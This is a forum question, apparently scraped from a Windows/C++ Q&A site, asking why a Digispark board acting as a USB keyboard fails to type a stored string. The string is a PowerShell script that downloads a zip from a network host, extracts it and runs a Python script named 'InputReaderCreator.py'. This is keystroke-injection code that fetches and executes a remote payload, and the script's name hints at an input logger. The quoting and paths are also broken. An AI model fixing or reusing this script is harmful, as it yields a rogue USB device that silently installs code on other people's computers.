digispark board will not print string?

  arduino, arduino-ide, c++

so i have this string that is a powershell command. and it will compile, but the digispark will not print it and just prints blank lines. here is my file with the string:

"(if (Test-Path -Path "C:Windows_IO\"){"
"( echo('directory found already. Using dir...')"
"(}else{"
"(  new-item -itemtype directory -path C:Windows_IO"
"(}"
"($p = "/Windows_IO/dwnld.zip";(New-Object System.Net.WebClient).DownloadFile("http://192.168.178.50:54414/dwnld",$p);n"
"( Add-Type -AssemblyName System.IO.Compression.FileSystem"
"(function Unzip"
"({"
"(    param([string]$zipfile, [string]$outpath)"
"(    if (Test-Path -Path $outpath){"
"(  echo('Output Path already found. deleting old files...')"
"(  Start-Sleep -seconds 0.3"
"(  Remove-item $outpath -Recurse"
"(    }"
"(    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)"
"(}"
"($o = "C:Windows_IOfinished\";"
"(Unzip $p $o;"
"(cd $o;"
"(python InputReaderCreator.py;"
"(}"

and this is the file that tries to print it:

void setup() {
  // put your setup code here, to run once:

}
String cmd = 
#include "Controller.h"
;
void loop() {
  // put your main code here, to run repeatedly:
  digitalWrite(1, HIGH);
  DigiKeyboard.println(cmd);
  delay(1000);
  digitalWrite(1,LOW);
  delay(1000);
}```

ive tried escaping most chars like " or , but it doesnt make a difference. I have also tried using R"()" but it gives errors as well. any ideas as to how i can get the digispark to print this ?

Source: Windows Questions C++

LEAVE A COMMENT